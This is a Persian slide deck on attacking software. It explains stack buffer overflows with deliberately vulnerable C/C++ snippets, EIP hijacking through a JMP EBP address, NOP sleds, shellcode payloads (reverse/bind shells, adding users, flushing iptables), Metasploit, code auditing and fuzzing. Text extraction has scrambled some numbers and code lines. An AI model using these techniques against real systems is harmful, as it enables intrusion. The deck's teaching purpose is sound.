Docstoc

Attacking_Software

Document Sample
Attacking_Software Powered By Docstoc
					               ‫مشکالت امنیتی نرم افزارها‬


          ‫مروری بر روش های کشف ، حمله و مقابله‬

  ‫سید حمید کشفی‬
‫‪Hamid@OISSG.org‬‬
 ‫5 تیر ماه 7831‬
           ‫مواردی که به آنها خواهیم پرداخت‬

          ‫بررسی روش های حمله به نرم افزارها‬      ‫‪‬‬
                  ‫نرم افزارهای کاربردی‬  ‫‪‬‬
              ‫مروری بر حمالت سرریز بافر‬  ‫‪‬‬

                  ‫نرم افزارهای تحت وب‬   ‫‪‬‬
 ‫مروری بر حمالت رایج )… ,‪(SQLi, XSS, Harvesting‬‬    ‫‪‬‬

        ‫بررسی روش های کشف ضعف های امنیتی‬         ‫‪‬‬
           ‫بازبینی کد )‪(Source-code Audit‬‬    ‫‪‬‬
             ‫‪Fuzzing & Fault-Injection‬‬     ‫‪‬‬
                 ‫‪Binary Analyzing‬‬      ‫‪‬‬
            ‫بررسی روش های مقابله با حمالت‬      ‫‪‬‬
‫سیستم های محافظتی موجود در سطح سیستم عامل و سخت افزار‬    ‫‪‬‬
   ‫سیستم های محافظتی ایجاد شده توسط نرم افزارهای جانبی‬  ‫‪‬‬
                                ‫2‬
       ‫حمله به نرم افزار – نرم افزارهای کاربردی‬

       ‫‪ ‬ضعف امنیتی در نرم افزار چیست ؟‬
 ‫‪ ‬منظور از ‪ Exploit‬کردن یک ضعف امنیتی ؟‬
  ‫‪ ‬اهداف استفاده از ضعف های امنیتی نرم افزار‬
‫‪ ‬ایجاد اختالل در روال کار نرم افزار یا سیستم )‪(DoS‬‬
‫‪ ‬اجرای دستورالعملی خارج از روال معمول اجرای نرم‬
         ‫افزار)‪(Controling Software‬‬
    ‫‪ ‬بدست گرفتن کنترل کامل نرم افزار یا سیستم‬
          ‫عامل)‪(Controling System‬‬
               ‫‪ Payload ‬چیست ؟‬

                           ‫3‬
             ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬

               ‫‪ ‬بررسی روال اجرای یک نرم افزار‬
    ‫‪ ‬اختصاص یک محدوده آدرس در حافظه برای بارگذاری‬
               ‫دستورالعمل ها و اطالعات الزم‬
       ‫‪ ‬بارگذاری سگمنت های تعریف شده در نرم افزار‬
              ‫‪ : .text ‬حاوی دستورالعمل های اجرایی برنامه‬
‫‪ : .bss ‬حاوی اطالعات و متغیر های تعریف نشده )‪(uninitialized data‬‬

‫‪ : .data ‬حاوی اطالعات و متغیر های تعریف شده )‪(static initialized data‬‬

               ‫‪ ‬اختصاص فضای ‪ Stack‬و ‪Heap‬‬


                                     ‫4‬
          ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬

 ‫سرریز بافر زمانی رخ میدهد که حجم اطالعات کپی شده به بافر ،‬  ‫‪‬‬
           ‫بیشتر از میزان مشخص شده برای بافر باشد.‬
‫>‪#include <stdio.h‬‬
‫)‪Int main (int arge , char **argv‬‬
‫{‬
‫‖‪char target[5]=“AAAA‬‬
‫;)‖‪strcpy(target, ―AAAAABBBBCCCC‬‬
‫;)‖‪Printf(―%\n‖,target‬‬
‫;0 ‪Return‬‬
‫}‬

                                ‫5‬
                  ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬

        Stack Overflow ‫ بررسی یک کد آسیب پذیر به‬
#include <iostream.h>
#include <stdio.h>                     12345...
#include <conio.h>
#include <stdio.h>

int Hijack()
{      cout << "This function should be hijacked!";
       getchar();                    ....ABCD
       return 0; }
                                 EIP
int Function1()
{      char var1[15];
      cout << "_________1234567890abcd" <<
endl;                              Main()
      cout << "Enter Var1:";
      cin >> var1;
      cout << var1 << endl;
      return 0; }                    Hijack()
int main()
{      Function1();
      getchar();                          6
      return 0; }
       ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬

‫اتفاقی که پس از سرریز بافر رخ میدهد : تخریب روال اجرا‬  ‫‪‬‬
                  ‫...54321‬


                  ‫6543210.....‬

                   ‫) ‪EBP ( AAAA‬‬
                   ‫) ‪EIP ( BCDE‬‬


                    ‫)(‪Main‬‬                    ‫)(‪Hijack‬‬


                            ‫7‬
            ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬

‫استفاده از قابلیت تغییر‪ EIP‬برای کنترل نرم افزار وفراخوانی توابعی که در روال اجرای‬  ‫‪‬‬
                        ‫معمولی برنامه , فراخوانی نمیشوند‬
                               ‫...54321‬


                               ‫6543210.....‬

                                ‫) ‪EBP ( AAAA‬‬
                                ‫) 05010400( ‪EIP‬‬


                                   ‫)(‪Main‬‬                                  ‫)(‪Hijack‬‬

                                          ‫8‬
            ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬

  ‫با استفاده از روش ذکر شده ، میتوان اقدام به اجرای کد و دستورات دلخواه‬  ‫‪‬‬
                                  ‫نمود‬
    ‫با توجه به اینکه داده های ارسالی ما مستقیمآ در حافظه درج میشوند ،‬  ‫‪‬‬
                 ‫دستورات می بایست به زبان ماشین باشد.‬
‫به دستوراتی که برای اجرا در حافظه درج میشوند اصطالحآ ‪ Payload‬گفته‬      ‫‪‬‬
                                  ‫میشود‬
  ‫رعایت نکردن نکاتی همچون عدم استفاده از کاراکترهای خاص )00‪(0x‬‬      ‫‪‬‬
                        ‫باعث بروز مشکل خواهد شد‬
 ‫برای اینکه بتوانیم دستورات دلخواه خود را اجرا کنیم ، میبایست آدرس دقیق‬  ‫‪‬‬
                    ‫آنها را پس از درج در حافظه بدانیم‬
 ‫روال پیاده سازی حمالت در واقعیت ، بسیار پیچیده تر و مشکل تر میباشد ~‬    ‫‪‬‬                                      ‫9‬
                ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬

‫...54321‬            ‫از دید پردازنده ، تفاوتی میان دستورالعمل ها و داده ها وجود‬  ‫‪‬‬
‫]‪[Injected Payload‬‬     ‫ندارد . ورودی داده شده درصورتی که دستور زبان ماشین معتبر‬
                                   ‫باشد اجرا خواهد شد.‬
‫6543210.....‬         ‫یکی از روش های تزریق ‪ Payload‬درحافظه ، ارسال آن در‬       ‫‪‬‬
                         ‫قالب پارامترهای ورودی نرم افزار میباشد‬
  ‫) ‪EBP ( AAAA‬‬
                 ‫سرریز بافر میتواند هم در فضای ‪ Stack‬و هم در فضای‬      ‫‪‬‬
‫)}‪EIP (0x{Payload Offset‬‬
                                     ‫‪ Heap‬رخ دهد‬
              ‫بسته به محل وقوع سرریز )‪ (stack / Heap overflow‬نحوه‬       ‫‪‬‬
    ‫)(‪Main‬‬         ‫تغییر روال اجرای برنامه و پرش به محل ‪ Payload‬متفاوت‬
                ‫بوده وتکنیک ها و روش های مختلفی برای هر حالت وجود‬
                                          ‫دارد.‬
   ‫)(‪Hijack‬‬        ‫قابلیت بازنویسی ‪ EIP‬الزامی نیست ! در نظر داشته باشید که‬    ‫‪‬‬
               ‫بازنویسی هر یک از ثبات ها میتواند در نهایت منجر به اجرای‬
          ‫00‪0x‬‬
                                    ‫‪ Payload‬گردد‬

                                              ‫01‬
                 ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬
          ‫روال پیاده سازی حمالت در واقعیت ، بسیار پیچیده تر و مشکل تر میباشد:‬       ‫‪‬‬
‫‪ ‬آدرس های بارگذاری توابع و ‪ Dll‬ها بسته به هر نسخه نرم افزار ، سیستم عامل و حتی ‪Service‬‬
                                   ‫‪ Pack‬تغییر میکند‬
   ‫در برخی موارد ، آدرس ها و ‪ offset‬های ثابت که در تمامی نسخ یکسان هستند نیز وجود دارند‬   ‫‪‬‬

              ‫‪ ‬نیاز به آگاهی از آدرس دقیق دستورات درج شده )‪ (Payload‬در حافظه‬
         ‫بر خالف ‪ ، Linux‬تخمین آدرس دقیق ‪ Stack‬در ویندوز براحتی امکانپذیر نیست‬     ‫‪‬‬
                            ‫استفاده از تکنیک ‪Return-to-lib/dll‬‬    ‫‪‬‬
                                  ‫استفاده از ‪NOP Sled‬‬     ‫‪‬‬

                    ‫‪ ‬محدودیت در حجم دستوراتی که میتوان در بافر درج کرد‬
      ‫استفاده از بخش های مختلف حافظه که قابلیت تزریق در آنها وجود دارد ، و پرش بین آنها‬  ‫‪‬‬
                            ‫استفاده از ‪ Payload‬های چند مرحله ایی‬   ‫‪‬‬

                 ‫‪ ‬محدودیت در استفاده ازکاراکترهایی که در حافظه درج میگردد‬
               ‫شناسایی کاراکترهایی که پس از تزریق در حافظه دستکاری میشوند‬    ‫‪‬‬
               ‫‪ Encode‬کردن ‪ Payload‬برای پرهیز از وجود کاراکترهای خاص‬       ‫‪‬‬

                                ‫‪ ‬نحوه ارسال دستورات به نرم افزار‬
                                                  ‫11‬
                 ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬
 ‫‪ ‬در زبان ماشین ، امکان مقدار دهی به ‪ EIP‬بصورت مستقیم وجود ندارد ) مقادیر سایر ثبات ها توسط‬
                   ‫دستوراتی چون ‪ ... CALL MOV JMP‬به ‪ EIP‬داده میشوند (‬
 ‫‪ ‬در مثالی که پیش از این ذکر شد ، با فرض اینکه ما امکان بدست آوردن آدرس دقیق ‪ Payload‬برای‬
  ‫استفاده دربازنویسی ‪ EIP‬را در نداریم ، میبایست از مقدار بازنویسی شده سایر ثبات ها استفاده کنیم .‬
   ‫‪ EBP ‬بازنویسی شده ، پس باید به دنبال دستورالعملی باشیم که محتوای ‪ EBP‬را در ‪ EIP‬درج کند‬
                                           ‫)‪(JMP EBP‬‬
  ‫‪ ‬قدم بعد ، بازنویسی ‪ EBP‬برای اشاره به آدرسی از حافظه است که در آن دستورالعمل ‪JMP EBP‬‬
                                           ‫وجود داشته باشد‬
 ‫‪ ‬نکته : توابع کتابخانه ایی پویا)‪ (DLL‬همواره در آدرس های مشخصی از حافظه بارگزاری میشوند . در‬
 ‫هر یک از ‪ DLL‬های موجود در حافظه ممکن است بخشی از دستورات ، دستورات مورد نظر ما باشد‬
‫‪ ‬ایده : جستجوی محدوده آدرس توابع کتابخانه ایی برای دستورالعمل مورد نظر ما ، و بدست آوردن آدرس‬
                                      ‫)‪ (offset‬آن دستورالعمل‬
                               ‫‪ ‬استفاده از ابزارهایی مانند ‪FindJump‬‬
            ‫‪ ‬بازنویسی ‪ EIP‬با ‪ 0x7c822cac‬محتویات ‪ EBP‬را در ‪ EIP‬بازنویسی میکند‬
                           ‫‪ ‬بدین ترتیب بدون نیاز به درج آدرس ‪Payload‬‬
                                 ‫بطور مسقیم در ‪ ، EIP‬آنرا اجرا میکنیم‬
                                 ‫‪ ‬نتیجه : پایداری بیشتر در روال حمله‬


                                                  ‫21‬
               ‫نرم افزارهای کاربردی – حمالت سرریز بافر‬

           ‫‪ ‬نتیجه نهایی ، نمایی از ‪ Stack‬پس از حمله‬
‫]… ‪GET / AA….A[ 0x90 Nop] [ JMP ] [overwrite EBP] [Overwrite EIP] [NOP] […. Payload‬‬

             ‫5‬      ‫3‬   ‫6‬


‫‪AA...A‬‬   ‫‪NOP Sled jmp EBPEIP NOP‬‬                   ‫‪Payload‬‬


           ‫4‬                    ‫‪ EIP‬با آدرسی که به ‪ jmp ebd‬اشاره دارد بازنویسی میشود‬   ‫1.‬
                                    ‫پردازنده به آدرس مراجعه کرده و دستور اجرا میشود‬  ‫2.‬
             ‫2‬      ‫1‬
                           ‫محتویات ‪ EBP‬که به محل ‪ Nop Sled‬در حافظه اشاره دارد ، در ‪EIP‬‬     ‫3.‬
                                                  ‫بازنویسی میشود‬
            ‫‪Jmp ebp‬‬          ‫پردازنده با توجه به ‪ ، EIP‬برای ادامه اجرای دستورات به آدرس ‪Nop Sled‬‬   ‫4.‬
                                                   ‫مراجعه میکند‬
           ‫‪Kernel32.dll‬‬
                           ‫پس از پایان ‪ Nop‬پردازنده به دستور پرش به ‪ Nop Sled‬دوم میرسد‬    ‫5.‬
                       ‫‪ Nop Sled‬دوم اجرا شده و روال در نهایت به اجرای ‪ Payload‬ختم میگردد.‬     ‫6.‬

                                                          ‫31‬
                    ‫حمالت سرریز بافر – بررسی ‪ Payload‬ها‬
                      ‫به مرحله اجرای ‪ Payload‬رسیدیم . چه انتخاب هایی پیش رو داریم ؟‬      ‫‪‬‬
  ‫مراحل ادامه حمله پس از بارگذاری موفقیت آمیز ‪ ، Payload‬اصطالحآ ‪ Post Exploitation‬خوانده میشوند.‬         ‫‪‬‬
                            ‫وجه مشترک همه ‪ Payload‬ها : بر اساس زبان ماشین‬        ‫‪‬‬
‫وجه تمایز : اجرای ‪ Payload‬در حافظه هر ‪ Platform‬و معماری پردازنده ، میبایست بر اساس همان شرایط باشد.‬         ‫‪‬‬
 ‫برای تهیه و نوشتن ‪ Payload‬برای هر معماری میبایست از زبان ماشین همان پردازنده استفاده شود ) , 46/23‪IA‬‬        ‫‪‬‬
                                    ‫‪ SPARC , PowerPC, MIPS‬و... (‬
    ‫دستوراتی که ‪ Payload‬قصد اجرای آنرا دارند ، میبایست منطبق با سیستم عاملی باشد که به آن حمله میشود.‬      ‫‪‬‬
                                        ‫برخی از ‪ Payload‬های رایج :‬      ‫‪‬‬
                    ‫اجرای دستورات بر روی سیستم عامل ) … , ‪( add user , iptables –F‬‬     ‫‪‬‬
                    ‫فراهم کردن دسترسی از راه دور به سیستم هدف ) ‪(Reverse/Bind Shell‬‬     ‫‪‬‬
            ‫فراهم کردن دسترسی پیشرفته از طریق ‪ Payload‬های پیچیده )‪( Meterpreter , MOSDEF‬‬      ‫‪‬‬
               ‫‪ Proxy‬کردن فرامین زبان ماشین به سیستم هدف ، برای اجرا )‪( SysCall Proxying‬‬     ‫‪‬‬
                  ‫در شرایط معمولی ، میتوان از ‪ Shellcode‬های از پیش آماده شده استفاده کرد‬     ‫‪‬‬
                                     ‫/‪http://milw0rm.com/shellcode‬‬     ‫‪‬‬
                  ‫‪http://metasploit.org/data/shellcode/win32msf20payloads.tar.gz‬‬        ‫‪‬‬
 ‫بسته ‪ Metasploit Framework‬بیش از یکصد ‪ Payload‬آماده برای استفاده درشرایط ، سیستم عامل ها و معماری های‬     ‫‪‬‬
                        ‫مختلف پردازنده را در اختیار قرار میدهد. )‪( www.metasploit.org‬‬
                                                          ‫41‬
            ‫حمالت سرریز بافر – ‪Exploit Frameworks‬‬

   ‫همانطور که بررسی شد ، پیاده سازی یک حمله سرریز بافر مستلزم طی‬            ‫‪‬‬
                         ‫مراحل مختلف میباشد‬
 ‫انجام برخی مراحل مستلزم تولید کد/ابزارهای خاص برای سرعت بخشیدن به کار میباشد‬     ‫‪‬‬
‫تولید ‪ Payload‬ها و بهینه سازی و آزمایش آنها امری زمان بر و نیازمند تجربه میباشد‬    ‫‪‬‬
     ‫در صورت لزوم پرهیز از کاراکترهای خاص ، پروسه تولید یا ‪ Encode‬کردن‬       ‫‪‬‬
                           ‫‪ Payload‬میبایست تکرارشود‬
   ‫برای استفاده از یک ضعف امنیتی در شرایط مختلف ، میبایست از ‪ Payload‬های‬      ‫‪‬‬
                                ‫متفاوتی استفاده گردد‬
 ‫با هربار نیاز به ایجاد تغییر جزئی در کد اکسپلویت ، کد میبایست مجددآ کامپایل و مورد‬  ‫‪‬‬
                                 ‫استفاده قرار گیرد‬
  ‫وجود یک مجموعه از ابزارها و امکانات در کنار یکدیگر که صرفآ برای‬            ‫‪‬‬
  ‫آنالیز و تولید کد های اکسپلویت برای حمالت سرریز بافر تولید شده ، کمک‬
                        ‫بزرگی محسوب میگردد.‬

                                              ‫51‬
           ‫حمالت سرریز بافر – ‪Exploit Frameworks‬‬
     ‫‪ Exploitation Framework‬های موجود به ما کمک میکنند تا‬                    ‫‪‬‬
 ‫تنها یکبار اقدام به معرفی مشخصات ضعف امنیتی پرداخته و پس از آن بدون نیاز به‬           ‫‪‬‬
          ‫تغییر خاصی در کد ، بارها و در شرایط مختلف از آن استفاده کنیم‬
         ‫نگران مراحل زمانگیر تولید و تست ‪ Payload‬های مختلف نباشیم‬            ‫‪‬‬
‫براحتی و با استفاده از ‪ Encoder‬های موجود ، مشکل کاراکترهای فیلتر شده ) ‪Bad‬‬            ‫‪‬‬
                                ‫‪ (chars‬را حل کنیم‬
              ‫از امکانات موجود در ‪ Payload‬های پیشرفته استفاده کنیم‬         ‫‪‬‬
          ‫تعداد خطوط کد الزم برای تولید یک اکسپلویت بسیار کاهش میبابد‬         ‫‪‬‬
         ‫کمتر از 5 خط کد در محیط ‪ Framework‬معادل ده ها خط کد در یک اکسپلویت مستقل!‬  ‫‪‬‬

              ‫معرفی ‪ Metasploit Framework‬و امکانات آن‬                 ‫‪‬‬
                         ‫ابزارهای کمکی برای طی مراحل اولیه‬       ‫‪‬‬
           ‫تولید ‪ Pattern‬برای سرریز کردن بافر )‪(pattern_create.rb‬‬         ‫‪‬‬
  ‫محاسبه سایز بافر ، و تعداد بایت الزم برای سرریز کردن بافر )‪(pattern_offset.rb‬‬      ‫‪‬‬
         ‫بانک اطالعاتی بسیار کامل برای یافتن ‪ offset‬های مختلف و مناسب‬        ‫‪‬‬
                        ‫)/‪(http://metasploit.org/opcodedb‬‬                                                   ‫61‬
Metasploit Framework
   DEMO
            17
               ‫حمالت سرریز بافر – علت بروز مشکل‬

‫حمالت سرریزبافر ناشی از اشتباهات برنامه نویس در استفاده از توابع زبان‬    ‫‪‬‬
                          ‫برنامه نویسی هستند.‬
  ‫بسیاری از توابع ، به خودی خود ورودی/خروجی خود را کنترل نمیکنند‬      ‫‪‬‬
‫انتظار میرود که برنامه نویس پیش از استفاده از چنین توابعی ، حجم و نوع‬    ‫‪‬‬
 ‫اطالعات ارسالی/دریافتی از تابع را کنترل کند تا از بروز مشکل جلوگیری‬
                                  ‫شود.‬
 ‫برخی از توابع که استفاده از آنها بدون کنترل قبلی ، منجر به سرریز بافر‬   ‫‪‬‬
 ‫میگردد : )(‪strcat() , strcpy() ,sprintf() , vsprintf() , bcopy‬‬
                           ‫)(‪,gets() ,scanf‬‬
  ‫استفاده از توابع کتابخانه ایی که دارای مشکل هستند ، برنامه شما را نیز‬  ‫‪‬‬
                       ‫دوچار مشکل امنیتی میکنند.‬


                                      ‫81‬
                     ‫حمالت سرریز بافر – علت بروز مشکل‬

Vulnerable Function         Function’s Purpose                    Why Vulnerable


  Memcpy()     Copies one part of the memory to another, taking    It can place too much data, into too small a buffer,
              two a source, a destination and a number of            thus causing an overflow.
                    bytes as arguments.   Gets()     Receives data from the user, and places it into a   Doesn’t check how much data has been placed in
                       buffer.                  the buffer, perhaps too much!
   Sprintf()     Places formatted data into a buffer, replacing    It doesn’t check how much data is being placed
              arguments with data, for example ‘%s’, ‘hi’              into the buffer.
               being written to buffer[5]; would result in
              not ‘%s’ being placed in the buffer, but ‘hi’.
   Strcat()      Sticks one buffer onto the end of another.      Doesn’t check that the data being added will fit
                                               within the buffer limits/


   Strcpy()      Copies the content of one buffer to another.     Once again, the destination length is not compared
                                               with the source length.
                                                                  19
                   ‫شناسایی مشکالت امنیتی نرم افزار‬
‫تکنیک ها و روش های متفاوتی برای شناسایی ضعف های امنیتی موجود در‬       ‫‪‬‬
                       ‫نرم افزارها وجود دارد‬
                  ‫بررسی کد )‪(Source-Code Audit‬‬   ‫‪‬‬
                    ‫‪Fuzzing & Fault-Injection‬‬   ‫‪‬‬
                 ‫‪Binary (Static/Dynamic) Analyze‬‬   ‫‪‬‬
  ‫بسته به شرایط ، امکانات ودقت عمل الزم از یک یا ترکیبی از چند روش‬    ‫‪‬‬
                  ‫برای آنالیز یک نرم افزار استفاده میشود‬
        ‫الزامآ پیچیده ترین روش ، همیشه بهینه ترین روش نیست !‬    ‫‪‬‬
  ‫اگرچه بسیاری از تکنیک های کشف و شناسایی مشکالت امنیتی بصورت‬       ‫‪‬‬
‫‪ Automated‬نیز دراختیارهستند ، اما همواره نیاز به یک کاربر مسلط و با‬
                            ‫تجربه وجود دارد.‬
    ‫لزومآ هر مشکل سرریز بافر شناسایی شده ، قابل استفاده برای اجرای‬    ‫‪‬‬
                             ‫کد/دستور نیست .‬


                                      ‫02‬
             ‫شناسایی مشکالت امنیتی نرم افزار – ‪Code Audit‬‬

                        ‫بررسی کد )‪(Source-Code Audit‬‬          ‫‪‬‬
     ‫))(‪(...strcat(), strcpy() ,sprintf(), vsprintf‬‬  ‫‪ ‬جستجو برای شناسایی توابع پر خطر‬
          ‫کنترل روال برنامه ، برای شناسایی مشکالت منطقی )‪(Logical‬‬        ‫‪‬‬
‫روال جستجو بصورت ‪ ) Static‬بدون اجرای کد ( و ‪ ) Dynamic‬اجرا و بررسی کد (‬          ‫‪‬‬

    ‫وجود یک تابع آسیب پذیر در کد ، به معنی وجود مشکل امنیتی نیست‬              ‫‪‬‬
           ‫بررسی و خواندن کد عملی خسته کننده و زمانبر است.‬              ‫‪‬‬
    ‫حتی نرم افزارها و توابع ساده ، متشکل از چندین هزارخط کد میباشند.‬            ‫‪‬‬
‫یکی از روش های تسریع بررسی ، تمرکز بر روی بخش هایی از کد است که‬                ‫‪‬‬
‫احتمال وجود مشکل در آنها باالست ) توابع دریافت ورودی ، خواندن و نوشتن‬
                              ‫داده و ... (‬


                                                ‫12‬
         ‫شناسایی مشکالت امنیتی نرم افزار – ‪Code Audit‬‬

                 ‫بررسی کد )‪(Source-Code Audit‬‬               ‫‪‬‬
                ‫استفاده از ابزارهای ‪ Automated‬برای بررسی کد‬       ‫‪‬‬
               ‫ابزارهای آزاد و تجاری بسیاری بدین منظور تولید شده‬   ‫‪‬‬

         ‫سرعت عمل این ابزارها در مقایسه با روش معمولی ، بسیار باالست‬    ‫‪‬‬

   ‫ابزارها غالبآ برای بررسی یک یا چند زبان برنامه نویسی خاص طراحی میشوند‬     ‫‪‬‬

      ‫درصد گزارش های خطا )‪ (False Positive‬در اینگونه ابزارها باالست‬      ‫‪‬‬

‫این قبیل ابزارها قادر به تشخیص و گزارش مشکالت امنیتی ناشی از خطاهای ‪Logical‬‬     ‫‪‬‬
                                      ‫نیستند‬
 ‫استفاده از این ابزارها به تنهایی ، برای بررسی امنیتی یک نرم افزار هرگز کافی نیست‬  ‫‪‬‬

    ‫لیستی از ابزارهای ‪ Automated‬برای ‪: Static Code Audit‬‬                ‫‪‬‬
      ‫‪http://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis ‬‬
     ‫‪http://samate.nist.gov/index.php/Source_Code_Security_Analyzers ‬‬
                                              ‫22‬
             ‫شناسایی مشکالت امنیتی نرم افزار- ‪Fuzzing‬‬

                    ‫‪Fuzzing & Fault-Injection‬‬         ‫‪‬‬
      ‫‪ ‬هزینه کمتر در مقایسه با سایر روش ها ، به نسبت بازدهی‬
   ‫‪ ‬قابلیت پیاده سازی با پیچیدگی کمتر ، در مقایسه با سایر روش ها‬
         ‫‪ ‬بررسی ‪ BlackBox‬نرم افزار برای کشف مشکالت‬
‫‪ ‬تولید ورودی های تصادفی اما کنترل شده ، که منجر به ایجاد اختالل در‬
                      ‫روند کار نرم افزار گردد.‬
            ‫تغذیه نرم افزار و پارامتر ها با داده های کامآل تصادفی‬  ‫‪‬‬
 ‫تغذیه نرم افزار و پارامترها در قالب پروتکل ها و استانداردهای مشخص ، اما با‬  ‫‪‬‬
                         ‫پارامترها و مقادیر تصادفی‬
‫‪ ‬داده های تولید شده توسط ‪ Fuzzer‬باید آنقدر حساب شده باشند تا از دید‬
‫نرم افزار قابل دریافت و محاسبه باشند ، و در عین حال آنقدر تصادفی و‬
          ‫مامتعارف که بتوانند نرم افزار را دوچار اختالل کنند.‬


                                          ‫32‬
                  ‫شناسایی مشکالت امنیتی نرم افزار- ‪Fuzzing‬‬
                                   ‫تکنیک های مختلف ‪: Fuzzing‬‬    ‫‪‬‬
                                   ‫‪Session Data Fuzzers ‬‬
‫بررسی اطالعات و پارامترهای رد و بدل شده در یک ‪ session‬معتبر وسعی در دستکاری پارامترها و‬      ‫‪‬‬
                                        ‫ارسال آنها‬
                           ‫پیاده سازی این روش بسیار ساده میباشد‬     ‫‪‬‬

                                    ‫‪Specialized Fuzzers ‬‬
          ‫بررسی کلیه پارامترها و خواص یک پروتکل/استاندارد خاص در قالب ‪Fuzzing‬‬      ‫‪‬‬
                      ‫نیازمند تولید ابزار/اسکریپت خاص برای هر پروتکل‬    ‫‪‬‬
‫کارآمدی ‪ Fuzzer‬وابسته به کیفیت پیاده سازی پروتکل و تعریف پارامترهای آن برای ‪ Fuzzing‬میباشد‬    ‫‪‬‬
       ‫تولید این دسته از ‪ Fuzzer‬ها نیازمند اشراف کامل و دقیق به پروتکل تحت بررسی دارد‬    ‫‪‬‬
                ‫استفاده از این قبیل ‪ Fuzzer‬ها نیاز به دانش فنی باالی کاربر ندارد‬  ‫‪‬‬
         ‫‪ Fuzzer‬های اختصاصی برای … , ‪SIP , SSL , SMTP , SNMP , RPC‬‬            ‫‪‬‬

                                       ‫‪Generic Fuzzers ‬‬
                             ‫قابلیت ‪ Fuzzing‬پروتکل های متعدد‬     ‫‪‬‬
        ‫کاربر میبایست اقدام به تعریف پروتکل مورد نظر خود تحت امکانات ‪ Fuzzer‬بنماید‬    ‫‪‬‬
       ‫تمام پارامترهایی که می بایست بررسی شوند ، توسط کاربر به ‪ Fuzzer‬معرفی میشوند‬     ‫‪‬‬
                ‫استفاده از این دسته ‪ Fuzzer‬ها برای کاربران عادی مشکل است‬     ‫‪‬‬
 ‫کیفیت تست یک پروتکل خاص توسط این دسته ، در مقایسه با ‪ Specialized Fuzzer‬ها کمتر است.‬       ‫‪‬‬
                                                   ‫42‬
                ‫شناسایی مشکالت امنیتی نرم افزار- ‪Fuzzing‬‬
‫نمیتوان انتظار داشت که همیشه جایگزینی مقدار یک پارامتر در پروتکل با داده ایی بزرگتر ،‬       ‫‪‬‬
                                   ‫از دید نرم افزار معتبر باشد‬
    ‫در بسیاری از پروتکل ها )خصوصآ پروتکل های باینری( بدلیل ماهیت داده ها ، نیاز به‬       ‫‪‬‬
                        ‫تفکیک فیلد های مختلف داده ها از یکدیگر میباشد.‬
          ‫حداقل اطالعات مربوط به هر فیلد میتواند شامل سایز فیلد و داده آن فیلد باشد‬    ‫‪‬‬
 ‫در صورتی که بدون در نظر گرفتن این مورد اقدام به دستکاری محتوای یک پروتکل گردد،‬          ‫‪‬‬
   ‫پارامترهای ‪ Fuzz‬شده یک فیلد ، اطالعات فیلد های بعد از خود را تخریب میکند = غیر‬
                            ‫معتبر شدن آن درخواست از دید نرم افزار‬
 ‫مفهوم ‪ Block Based Fuzzing‬بر همین اصل استوار است . محاسبه پویای سایز هر فیلد‬           ‫‪‬‬
  ‫، کل بسته درخواست و چیدن همه پارامتر های معتبر و تحت بررسی در کنار یکدیگر ، در‬
                            ‫زمان تولید یک درخواست برای نرم افزار‬
    ‫مثال ساده : در بررسی پروتکل ‪ HTTP‬و ارسال یک درخواست ‪ POST‬نمیتوان تنها‬           ‫‪‬‬
 ‫پارامترها را دستکاری و ارسال نمود ، بلکه در هر درخواست میبایست مقدار صحیح پارامتر‬
                  ‫‪ content-lenght‬محاسبه شده و در درخواست درج گردد.‬
  ‫‪ ، SPIKE‬یک نمونه ‪ General Fuzzer‬که بر مبنای ‪ Block-Based Fuzzing‬کار‬               ‫‪‬‬
                                             ‫میکند‬


                                                  ‫52‬
             ‫شناسایی مشکالت امنیتی نرم افزار- ‪Fuzzing‬‬

                   ‫اهداف ‪ Fuzzer‬ها و کاربرد آنها‬     ‫‪‬‬
‫‪ ‬بررسی پروتکل های ارتباطی شبکه ) ‪Routing protocols, IP stack‬‬
                                ‫…,(‬
                    ‫‪ ‬بررسی پروتکل های تحت شبکه‬
              ‫)…,‪(ssh,ftp,smtp,ssh,http,snmp‬‬
     ‫‪ ‬بررسی توابع , آرگومان ها و پارامترهای یک نرم افزار خاص‬
 ‫‪ ‬بررسی مشکالت مربوط به خواندن )‪ (parse‬اطالعات از فایل ورودی‬
  ‫‪ ‬بررسی بسته های نرم افزاری خاص )-‪browser,mail-client,ftp‬‬
                               ‫‪(clients‬‬
     ‫‪ ‬بررسی قابلیت ها و پارامترهای خاص ، در یک پروتکل خاص‬
 ‫‪ { . . . ‬هر نوع پارامتر ، داده و یا قابلیتی که به نحوی در روند کار نرم‬
                          ‫افزار دخیل است! {‬


                                      ‫62‬
          ‫شناسایی مشکالت امنیتی نرم افزار- ‪Fuzzing‬‬
                      ‫‪Fuzzing Frameworks‬‬        ‫‪‬‬
   ‫قابلیت عمل بصورت ‪ Generic Fuzzer‬یا ‪Specialized Fuzzer‬‬       ‫‪‬‬
            ‫غالبآ توسط زبان های اسکریپت نویسی تولید میشوند‬  ‫‪‬‬
       ‫‪ API‬های مختلفی را برای ‪ Fuzzing‬در اختیار قرار میدهند‬    ‫‪‬‬
            ‫از پروتکل های )تحت شبکه( زیادی پشتیبانی میکنند‬  ‫‪‬‬
       ‫قابلیت گسترش و افزودن پروتکل های جدید به ‪framework‬‬    ‫‪‬‬
        ‫‪ Fuzzer‬ها نسبت به گذشته تحوالت بسیاری داشته اند‬       ‫‪‬‬
                  ‫مانیتور کردن نرم افزار تحت بررسی‬  ‫‪‬‬
 ‫کنترل کردن روال اجرای نرم افزار توسط ‪ debugger‬همزمان با ‪Fuzzing‬‬    ‫‪‬‬
‫فراهم آوردن مجدد شرایط بصورت خودکار ، در صورت بروز اختالل در طول‬    ‫‪‬‬
               ‫‪ ) Fuzzing‬مانند ‪ crash‬کردن نرم افزار(‬
   ‫مانیتور کردن و ذخیره فعالیت های انجام شده در زمان ‪ Fuzzing‬و ...‬  ‫‪‬‬
                 ‫‖‪―Sulley Fuzzing Framework‬‬    ‫‪‬‬
      ‫‪http://www.fuzzing.org/wp-content/Amini-Portnoy-BHUS07.zip‬‬                                      ‫72‬
              ‫شناسایی مشکالت امنیتی نرم افزار- ‪Fuzzing‬‬
                        ‫برخی از ‪ Fuzzer‬های موجود‬      ‫‪‬‬
